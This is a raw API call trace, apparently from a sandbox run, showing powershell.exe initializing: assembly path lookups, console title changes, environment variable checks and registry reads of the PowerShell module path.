	[0426.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.056] CoTaskMemAlloc (cb=0x804) returned 0x1b99e850
	[0426.056] GetConsoleTitleW (in: lpConsoleTitle=0x1b99e850, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0426.278] CoTaskMemFree (pv=0x1b99e850) 
	[0426.288] CoTaskMemAlloc (cb=0x804) returned 0x1b99f100
	[0426.288] GetConsoleTitleW (in: lpConsoleTitle=0x1b99f100, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0426.288] CoTaskMemFree (pv=0x1b99f100) 
	[0426.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0426.291] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0428.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0428.330] SetConsoleCtrlHandler (HandlerRoutine=0x2b068dc, Add=1) returned 1
	[0428.347] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0428.513] CoCreateGuid (in: pguid=0x26db10 | out: pguid=0x26db10*(Data1=0x7810124, Data2=0xd9a7, Data3=0x4ffa, Data4=([0]=0x8d, [1]=0x3c, [2]=0x93, [3]=0xc7, [4]=0xd6, [5]=0x1c, [6]=0x36, [7]=0xe2))) returned 0x0
	[0428.514] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.514] CoTaskMemFree (pv=0x1b99c990) 
	[0428.517] WinSqmIsOptedIn () returned 0x0
	[0428.517] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.517] CoTaskMemFree (pv=0x1b99c990) 
	[0428.518] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.518] CoTaskMemFree (pv=0x1b99c990) 
	[0428.519] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.519] CoTaskMemFree (pv=0x1b99c990) 
	[0428.520] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.520] CoTaskMemFree (pv=0x1b99c990) 
	[0428.520] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.521] CoTaskMemFree (pv=0x1b99c990) 
	[0428.522] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.522] CoTaskMemFree (pv=0x1b99c990) 
	[0428.522] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.522] CoTaskMemFree (pv=0x1b99c990) 
	[0428.522] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.523] CoTaskMemFree (pv=0x1b99c990) 
	[0428.525] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.526] CoTaskMemFree (pv=0x1b99c990) 
	[0428.530] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.530] CoTaskMemFree (pv=0x1b99c990) 
	[0428.531] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.531] CoTaskMemFree (pv=0x1b99c990) 
	[0428.531] CoTaskMemAlloc (cb=0x104) returned 0x1b99c990
	[0428.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b99c990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0428.531] CoTaskMemFree (pv=0x1b99c990) 
	[0429.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0429.276] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0429.277] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0429.277] CoTaskMemFree (pv=0x1b9a9480) 
	[0429.278] CoTaskMemAlloc (cb=0xcc) returned 0x1b99a0c0
	[0429.278] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b99a0c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0429.278] CoTaskMemFree (pv=0x1b99a0c0) 
	[0429.278] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d688 | out: phkResult=0x26d688*=0x320) returned 0x0
	[0429.278] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d60c, lpData=0x0, lpcbData=0x26d608*=0x0 | out: lpType=0x26d60c*=0x2, lpData=0x0, lpcbData=0x26d608*=0x6c) returned 0x0
	[0429.278] CoTaskMemAlloc (cb=0x70) returned 0x1059d0
	[0429.278] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d5dc, lpData=0x1059d0, lpcbData=0x26d5d8*=0x6c | out: lpType=0x26d5dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x26d5d8*=0x6c) returned 0x0
	[0429.279] CoTaskMemFree (pv=0x1059d0) 
	[0429.279] CoTaskMemAlloc (cb=0xcc) returned 0x1b99a0c0
	[0429.279] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b99a0c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0429.279] CoTaskMemFree (pv=0x1b99a0c0) 
	[0429.279] CoTaskMemAlloc (cb=0xcc) returned 0x1b99a0c0
	[0429.279] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b99a0c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0429.279] CoTaskMemFree (pv=0x1b99a0c0) 
	[0429.282] RegCloseKey (hKey=0x320) returned 0x0
	[0429.282] CoTaskMemAlloc (cb=0xcc) returned 0x1b99a0c0
	[0429.282] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b99a0c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0429.283] CoTaskMemFree (pv=0x1b99a0c0) 
	[0429.283] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d688 | out: phkResult=0x26d688*=0x320) returned 0x0
	[0429.283] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d60c, lpData=0x0, lpcbData=0x26d608*=0x0 | out: lpType=0x26d60c*=0x0, lpData=0x0, lpcbData=0x26d608*=0x0) returned 0x2
	[0429.283] RegCloseKey (hKey=0x320) returned 0x0
	[0429.384] CoTaskMemAlloc (cb=0x20c) returned 0x165690
	[0429.384] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x165690 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0429.385] CoTaskMemFree (pv=0x165690) 
	[0429.385] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0429.386] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0429.456] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0429.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.456] CoTaskMemFree (pv=0x1b9a9480) 
	[0429.456] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0429.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.456] CoTaskMemFree (pv=0x1b9a9480) 
	[0429.458] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0429.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.458] CoTaskMemFree (pv=0x1b9a9480) 
	[0429.459] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0429.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0429.459] CoTaskMemFree (pv=0x1b9a9480) 
	[0429.460] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d478 | out: phkResult=0x26d478*=0x328) returned 0x0
